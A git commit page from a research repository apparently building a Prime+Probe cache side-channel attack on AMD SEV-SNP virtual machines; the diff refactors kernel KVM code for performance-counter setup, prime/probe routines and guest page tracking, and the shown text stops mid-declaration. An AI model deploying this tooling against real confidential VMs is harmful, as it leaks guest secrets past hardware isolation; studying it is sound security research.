cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit d4c8266836e9a4e6fa073667e4edfbbbb61e8666
parent da76c11f2059a8696a3df41844d49f82e6988843
Author: Louis Burda <quent.burda@gmail.com>
Date:   Wed,  5 Oct 2022 16:49:09 +0200

Sevstep and cachepc refactoring

Diffstat:
Mcachepc/cachepc.c | 88+++++++++++++++++++++++++++++++++++++++++++++++++++++++++----------------------
Mcachepc/cachepc.h | 4++--
Mcachepc/kvm.c | 23++++++++++++++---------
Dcachepc/util.c | 38--------------------------------------
Dcachepc/util.h | 8--------
Mpatch.diff | 12++++++------
Dsevstep/kvm.c | 205-------------------------------------------------------------------------------
Dsevstep/kvm.h | 4----
Msevstep/mmu.c | 6+++---
Msevstep/sevstep.c | 228+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++------
Msevstep/sevstep.h | 18++++++++----------
Msevstep/uspt.c | 10+++++-----
Mtest/kvm.c | 2+-
Mtest/sev-es.c | 2+-
Mtest/sev.c | 2+-
15 files changed, 317 insertions(+), 333 deletions(-)

diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c @@ -16,22 +16,13 @@ static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cach static cacheline **allocate_cache_ds(cache_ctx *ctx); static uint16_t get_virt_cache_set(cache_ctx *ctx, void *ptr); -void __attribute__((optimize(1))) // prevent instruction reordering -cachepc_prime_vcall(uintptr_t ret, cacheline *cl) -{ - cachepc_prime(cl); - asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); -} - -void __attribute__((optimize(1))) // prevent instruction reordering -cachepc_probe_vcall(uintptr_t ret, cacheline *cl) -{ - cachepc_probe(cl); - asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); -} +static void random_perm(uint32_t *arr, uint32_t arr_len); +static void gen_random_indices(uint32_t *arr, uint32_t arr_len); +static bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len); void -cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask) +cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, + bool host, bool guest, bool kernel, bool user) { uint64_t event; uint64_t reg_addr; @@ -47,9 +38,9 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask) reg_addr = 0xc0010200 + index * 2; event = event_no | (event_mask << 8); - event |= (1ULL << 17); /* OS (kernel) events only */ event |= (1ULL << 22); /* enable performance counter */ - event |= (1ULL << 40); /* Host events only */ + event |= ((kernel * 2ULL + user * 1ULL) << 16); + event |= ((host * 2ULL + guest * 1ULL) << 40); printk(KERN_WARNING "CachePC: Initialized %i. PMC %02X:%02X\n", index, event_no, event_mask); asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00)); @@ -149,6 +140,19 @@ cachepc_release_victim(cache_ctx *ctx, cacheline *victim) kfree(remove_cache_set(ctx, victim)); } +void * +cachepc_aligned_alloc(size_t alignment, size_t size) +{ + void *p; + + if (size % alignment != 0) + size = size - (size % alignment) + alignment; + p = kzalloc(size, GFP_KERNEL); + BUG_ON(((uintptr_t) p) % alignment != 0); + + return p; +} + void cachepc_save_msrmts(cacheline *head) { @@ -183,6 +187,19 @@ cachepc_print_msrmts(cacheline *head) } while (curr_cl != head); } +void __attribute__((optimize(1))) // prevent instruction reordering +cachepc_prime_vcall(uintptr_t ret, cacheline *cl) +{ + cachepc_prime(cl); + asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); +} + +void __attribute__((optimize(1))) // prevent instruction reordering +cachepc_probe_vcall(uintptr_t ret, cacheline *cl) +{ + cachepc_probe(cl); + asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); +} cacheline * prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) @@ -430,16 +447,39 @@ get_virt_cache_set(cache_ctx *ctx, void *ptr) return (uint16_t) ((((uintptr_t) ptr) & SET_MASK(ctx->sets)) / CACHELINE_SIZE); } -void * -cachepc_aligned_alloc(size_t alignment, size_t size) +void +random_perm(uint32_t *arr, uint32_t arr_len) { - void *p; + uint32_t i; - if (size % alignment != 0) - size = size - (size % alignment) + alignment; - p = kzalloc(size, GFP_KERNEL); - BUG_ON(((uintptr_t) p) % alignment != 0); + /* no special ordering needed when prefetcher is disabled */ + for (i = 0; i < arr_len; i++) + arr[i] = i; - return p; + // /* prevent stream prefetching by alternating access direction */ + // mid = arr_len / 2; + // for (i = 0; i < arr_len; i++) + // arr[i] = mid + (i % 2 ? -1 : 1) * ((i + 1) / 2); } +void +gen_random_indices(uint32_t *arr, uint32_t arr_len) +{ + uint32_t i; + + for (i = 0; i < arr_len; ++i) + arr[i] = i; + random_perm(arr, arr_len); +} + + +bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len) { + uint32_t i; + + for (i = 0; i < arr_len; ++i) { + if (arr[i] == elem) + return true; + } + + return false; +} diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h @@ -2,10 +2,10 @@ #include "asm.h" #include "cache_types.h" -#include "util.h" #include "uapi.h" -void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask); +void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, + bool host, bool guest, bool kernel, bool user); cache_ctx *cachepc_get_ctx(cache_level cl); void cachepc_release_ctx(cache_ctx *ctx); diff --git a/cachepc/kvm.c b/cachepc/kvm.c @@ -101,7 +101,7 @@ cachepc_kvm_prime_probe_test(void *p) arg = p; /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size); BUG_ON(lines == NULL); @@ -142,10 +142,10 @@ cachepc_kvm_stream_hwpf_test(void *p) arg = p; - /* TODO: accurately detect hwpf */ + /* TODO: improve detection */ /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size); BUG_ON(lines == NULL); @@ -175,7 +175,7 @@ cachepc_kvm_single_access_test(void *p) uint32_t *arg; /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); arg = p; @@ -209,7 +209,7 @@ cachepc_kvm_single_eviction_test(void *p) arg = p; /* l2 data cache, hit or miss */ - cachepc_init_pmc(0, 0x64, 0xD8); + cachepc_init_pmc(0, 0x64, 0xD8, true, false, true, false); WARN_ON(arg && *arg >= L1_SETS); if (arg && *arg >= L1_SETS) return; @@ -277,17 +277,22 @@ cachepc_kvm_init_pmc_ioctl(void *p) { uint32_t event; uint8_t index, event_no, event_mask; + uint8_t host_guest, kernel_user; WARN_ON(p == NULL); if (!p) return; event = *(uint32_t *)p; - index = (event & 0xFF000000) >> 24; - event_no = (event & 0x0000FF00) >> 8; - event_mask = (event & 0x000000FF) >> 0; + index = (event & 0xFF000000) >> 24; + host_guest = (event & 0x00F00000) >> 20; + kernel_user = (event & 0x000F0000) >> 16; + event_no = (event & 0x0000FF00) >> 8; + event_mask = (event & 0x000000FF) >> 0; - cachepc_init_pmc(index, event_no, event_mask); + cachepc_init_pmc(index, event_no, event_mask, + host_guest >> 1, host_guest & 1, + kernel_user >> 1, kernel_user & 1); } long diff --git a/cachepc/util.c b/cachepc/util.c @@ -1,38 +0,0 @@ -#include "util.h" - -void -random_perm(uint32_t *arr, uint32_t arr_len) -{ - uint32_t i; - - /* no special ordering needed when prefetcher is disabled */ - for (i = 0; i < arr_len; i++) - arr[i] = i; - - // /* prevent stream prefetching by alternating access direction */ - // mid = arr_len / 2; - // for (i = 0; i < arr_len; i++) - // arr[i] = mid + (i % 2 ? -1 : 1) * ((i + 1) / 2); -} - -void -gen_random_indices(uint32_t *arr, uint32_t arr_len) -{ - uint32_t i; - - for (i = 0; i < arr_len; ++i) - arr[i] = i; - random_perm(arr, arr_len); -} - - -bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len) { - uint32_t i; - - for (i = 0; i < arr_len; ++i) { - if (arr[i] == elem) - return true; - } - - return false; -} diff --git a/cachepc/util.h b/cachepc/util.h @@ -1,8 +0,0 @@ -#pragma once - -#include <linux/kernel.h> - -void random_perm(uint32_t *arr, uint32_t arr_len); -void gen_random_indices(uint32_t *arr, uint32_t arr_len); - -bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len); diff --git a/patch.diff b/patch.diff @@ -17,7 +17,7 @@ index eb186bc57f6a..3f767a27045e 100644 /* * The notifier represented by @kvm_page_track_notifier_node is linked into diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile -index 30f244b64523..ddfd48fbd8ca 100644 +index 30f244b64523..3c5f65040878 100644 --- a/arch/x86/kvm/Makefile +++ b/arch/x86/kvm/Makefile @@ -1,6 +1,6 @@ @@ -35,8 +35,8 @@ index 30f244b64523..ddfd48fbd8ca 100644 - hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o \ - mmu/spte.o + hyperv.o debugfs.o mmu/mmu.o mmu/page_track.o mmu/spte.o \ -+ svm/cachepc/cachepc.o svm/cachepc/util.o svm/cachepc/kvm.o \ -+ sevstep/sevstep.o sevstep/uspt.o sevstep/kvm.o ++ svm/cachepc/cachepc.o svm/cachepc/kvm.o \ ++ sevstep/sevstep.o sevstep/uspt.o ifdef CONFIG_HYPERV kvm-y += kvm_onhyperv.o @@ -46,7 +46,7 @@ index 30f244b64523..ddfd48fbd8ca 100644 -kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o +kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o \ -+ svm/cachepc/cachepc.o svm/cachepc/util.o ++ svm/cachepc/cachepc.o ifdef CONFIG_HYPERV kvm-amd-y += svm/svm_onhyperv.o @@ -382,14 +382,14 @@ index dfaeb47fcf2a..0626f3fdddfd 100644 2: cli diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c -index d9adf79124f9..1809b79cb6cd 100644 +index d9adf79124f9..082dc8553566 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -82,6 +82,8 @@ #include <asm/sgx.h> #include <clocksource/hyperv_timer.h> -+#include "sevstep/kvm.h" ++#include "sevstep/sevstep.h" + #define CREATE_TRACE_POINTS #include "trace.h" diff --git a/sevstep/kvm.c b/sevstep/kvm.c @@ -1,205 +0,0 @@ -#include "kvm.h" - -#include <linux/types.h> - -bool -__untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - if (mode == KVM_PAGE_TRACK_ACCESS) { - //printk("Removing gfn: %016llx from acess page track pool\n", gfn); - } - if (mode == KVM_PAGE_TRACK_WRITE) { - //printk("Removing gfn: %016llx from write page track pool\n", gfn); - } - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - - if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } else { - printk("Failed to untrack %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page track was not active"); - } - printk(KERN_CONT "\n"); - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__untrack_single_page); - -bool -__reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if( slot != NULL ) { - write_lock(&vcpu->kvm->mmu_lock); - //Vincent: The kvm mmu function now requires min_level - //We want all pages to protected so we do PG_LEVEL_4K - //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm,slot,gfn,PG_LEVEL_4K,KVM_PAGE_TRACK_RESET_ACCESSED); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__reset_accessed_on_page); - -bool -__clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if( slot != NULL ) { - write_lock(&vcpu->kvm->mmu_lock); - //Vincent: The kvm mmu function now requires min_level - //We want all pages to protected so we do PG_LEVEL_4K - //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, - PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__clear_nx_on_page); - -bool -__track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, - enum kvm_page_track_mode mode) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - if (mode == KVM_PAGE_TRACK_ACCESS) { - //printk_ratelimited("Adding gfn: %016llx to acess page track pool\n", gfn); - //printk("Adding gfn: %016llx to acess page track pool\n", gfn); - } - if (mode == KVM_PAGE_TRACK_WRITE) { - //printk_ratelimited("Adding gfn: %016llx to write page track pool\n", gfn); - } - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { - - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - - } else { - - printk("Failed to track %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } - if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page is already tracked"); - } - printk(KERN_CONT "\n"); - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - return ret; -} -EXPORT_SYMBOL(__track_single_page); - -long -kvm_start_tracking(struct kvm_vcpu *vcpu,enum kvm_page_track_mode mode ) -{ - long count = 0; - u64 iterator, iterat_max; - struct kvm_memory_slot *slot; - int idx; - - //Vincent: Memslots interface changed into a rb tree, see - //here: https://lwn.net/Articles/856392/ - //and here: https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - //Thus we use instead of - //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + vcpu->kvm->memslots[0]->memslots[0].npages; - struct rb_node *node; - struct kvm_memory_slot *first_memslot; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator=0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - if ( slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(kvm_start_tracking); - -long -kvm_stop_tracking(struct kvm_vcpu *vcpu,enum kvm_page_track_mode mode) -{ - long count = 0; - u64 iterator, iterat_max; - struct kvm_memory_slot *slot; - int idx; - - - //Vincent: Memslots interface changed into a rb tree, see - //here: https://lwn.net/Articles/856392/ - //and here: https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - //Thus we use instead of - //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + vcpu->kvm->memslots[0]->memslots[0].npages; - struct rb_node *node; - struct kvm_memory_slot *first_memslot; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator=0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - //Vincent: I think see here https://patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ - if ( slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(kvm_stop_tracking); - diff --git a/sevstep/kvm.h b/sevstep/kvm.h @@ -1,4 +0,0 @@ -#pragma once - -#include "sevstep.h" -#include "uapi.h" diff --git a/sevstep/mmu.c b/sevstep/mmu.c @@ -1,7 +1,7 @@ #include "../sevstep/sevstep.h" #include "../sevstep/uspt.h" -void +static void sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault) { @@ -19,7 +19,7 @@ sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, for (i = 0; i < sizeof(modes) / sizeof(modes[0]); i++) { if (kvm_slot_page_track_is_active(vcpu->kvm, fault->slot, fault->gfn, modes[i])) { - __untrack_single_page(vcpu, fault->gfn, modes[i]); + sevstep_untrack_single_page(vcpu, fault->gfn, modes[i]); was_tracked = true; } } @@ -27,7 +27,7 @@ sevstep_uspt_page_fault_handle(struct kvm_vcpu *vcpu, if (was_tracked) { have_rip = false; if (uspt_should_get_rip()) - have_rip = sev_step_get_rip_kvm_vcpu(vcpu,&current_rip) == 0; + have_rip = sevstep_get_rip_kvm_vcpu(vcpu, &current_rip) == 0; if (uspt_batch_tracking_in_progress()) { send_err = uspt_batch_tracking_save(fault->gfn << PAGE_SHIFT, fault->error_code, have_rip, current_rip); diff --git a/sevstep/sevstep.c b/sevstep/sevstep.c @@ -13,7 +13,6 @@ #include "cpuid.h" #include "mmu/spte.h" - #include <linux/kvm_host.h> #include <linux/types.h> #include <linux/string.h> @@ -44,12 +43,7 @@ struct kvm* main_vm; EXPORT_SYMBOL(main_vm); -// used to store performance counter values; 6 counters, 2 readings per counter -// TODO: static! -uint64_t perf_reads[6][2]; -perf_ctl_config_t perf_configs[6]; -int perf_cpu; - +static perf_ctl_config_t perf_configs[6]; uint64_t perf_ctl_to_u64(perf_ctl_config_t * config) @@ -60,10 +54,10 @@ perf_ctl_to_u64(perf_ctl_config_t * config) result |= config->EventSelect & 0xffULL; result |= (config->UintMask & 0xffULL) << 8; result |= (config->OsUserMode & 0x3ULL) << 16; - result |= (config->Edge & 0x1ULL ) << 18; - result |= (config->Int & 0x1ULL ) << 20; - result |= (config->En & 0x1ULL ) << 22; - result |= (config->Inv & 0x1ULL ) << 23; + result |= (config->Edge & 0x1ULL) << 18; + result |= (config->Int & 0x1ULL) << 20; + result |= (config->En & 0x1ULL) << 22; + result |= (config->Inv & 0x1ULL) << 23; result |= (config->CntMask & 0xffULL) << 24; result |= ((config->EventSelect & 0xf00ULL) >> 8) << 32; result |= (config->HostGuestOnly & 0x3ULL) << 40; @@ -88,8 +82,9 @@ read_ctr(uint64_t ctr_msr, int cpu, uint64_t* result) } void -setup_perfs() +sevstep_setup_pmcs(void) { + int perf_cpu; int i; perf_cpu = smp_processor_id(); @@ -107,7 +102,7 @@ setup_perfs() perf_configs[0].EventSelect = 0x0c0; perf_configs[0].UintMask = 0x0; perf_configs[0].En = 0x1; - write_ctl(&perf_configs[0],perf_cpu, CTL_MSR_0); + write_ctl(&perf_configs[0], perf_cpu, CTL_MSR_0); /* * programm l2d hit from data cache miss perf for @@ -118,12 +113,213 @@ setup_perfs() perf_configs[1].UintMask = 0x70; perf_configs[1].En = 0x1; perf_configs[1].HostGuestOnly = 0x2; /* count only host events */ - write_ctl(&perf_configs[1],perf_cpu,CTL_MSR_1); + write_ctl(&perf_configs[1], perf_cpu, CTL_MSR_1); +} +EXPORT_SYMBOL(sevstep_setup_pmcs); + +bool +sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + if (mode == KVM_PAGE_TRACK_ACCESS) { + //printk("Removing gfn: %016llx from acess page track pool\n", gfn); + } + if (mode == KVM_PAGE_TRACK_WRITE) { + //printk("Removing gfn: %016llx from write page track pool\n", gfn); + } + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + + if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } else { + printk("Failed to untrack %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page track was not active"); + } + printk(KERN_CONT "\n"); + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_untrack_single_page); + +bool +sevstep_reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if( slot != NULL ) { + write_lock(&vcpu->kvm->mmu_lock); + //Vincent: The kvm mmu function now requires min_level + //We want all pages to protected so we do PG_LEVEL_4K + //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm,slot,gfn,PG_LEVEL_4K,KVM_PAGE_TRACK_RESET_ACCESSED); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_reset_accessed_on_page); + +bool +sevstep_clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if( slot != NULL ) { + write_lock(&vcpu->kvm->mmu_lock); + //Vincent: The kvm mmu function now requires min_level + //We want all pages to protected so we do PG_LEVEL_4K + //https://patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ + sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, + PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_clear_nx_on_page); + +bool +sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, + enum kvm_page_track_mode mode) +{ + int idx; + bool ret; + struct kvm_memory_slot *slot; + + ret = false; + idx = srcu_read_lock(&vcpu->kvm->srcu); + if (mode == KVM_PAGE_TRACK_ACCESS) { + //printk_ratelimited("Adding gfn: %016llx to acess page track pool\n", gfn); + //printk("Adding gfn: %016llx to acess page track pool\n", gfn); + } + if (mode == KVM_PAGE_TRACK_WRITE) { + //printk_ratelimited("Adding gfn: %016llx to write page track pool\n", gfn); + } + slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm,slot, gfn, mode)) { + + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, gfn, mode); + write_unlock(&vcpu->kvm->mmu_lock); + ret = true; + + } else { + + printk("Failed to track %016llx because ", gfn); + if (slot == NULL) { + printk(KERN_CONT "slot was null"); + } + if (kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { + printk(KERN_CONT "page is already tracked"); + } + printk(KERN_CONT "\n"); + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + return ret; +} +EXPORT_SYMBOL(sevstep_track_single_page); + +long +sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + long count = 0; + u64 iterator, iterat_max; + struct kvm_memory_slot *slot; + int idx; + + //Vincent: Memslots interface changed into a rb tree, see + //here: https://lwn.net/Articles/856392/ + //and here: https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + //Thus we use instead of + //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + struct rb_node *node; + struct kvm_memory_slot *first_memslot; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + first_memslot->npages; + for (iterator = 0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; +} +EXPORT_SYMBOL(sevstep_start_tracking); + +long +sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) +{ + long count = 0; + u64 iterator, iterat_max; + struct kvm_memory_slot *slot; + int idx; + + + //Vincent: Memslots interface changed into a rb tree, see + //here: https://lwn.net/Articles/856392/ + //and here: https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + //Thus we use instead of + //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + struct rb_node *node; + struct kvm_memory_slot *first_memslot; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + first_memslot->npages; + for (iterator=0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + //Vincent: I think see here https://patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ + if ( slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; } -EXPORT_SYMBOL(setup_perfs); +EXPORT_SYMBOL(sevstep_stop_tracking); int -sev_step_get_rip_kvm_vcpu(struct kvm_vcpu* vcpu,uint64_t *rip) +sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip) { return 0; } diff --git a/sevstep/sevstep.h b/sevstep/sevstep.h @@ -10,7 +10,6 @@ #include <linux/pid.h> #include <linux/psp-sev.h> - #define CTL_MSR_0 0xc0010200ULL #define CTL_MSR_1 0xc0010202ULL #define CTL_MSR_2 0xc0010204ULL @@ -47,21 +46,20 @@ bool sevstep_rmap_protect(struct kvm_rmap_head *rmap_head, bool sevstep_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, uint64_t gfn, int min_level, enum kvm_page_track_mode mode); -bool __untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, +bool sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, enum kvm_page_track_mode mode); -bool __track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, +bool sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, enum kvm_page_track_mode mode); -bool __reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); -bool __clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); +bool sevstep_reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); +bool sevstep_clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); -long kvm_start_tracking(struct kvm_vcpu *vcpu, enum 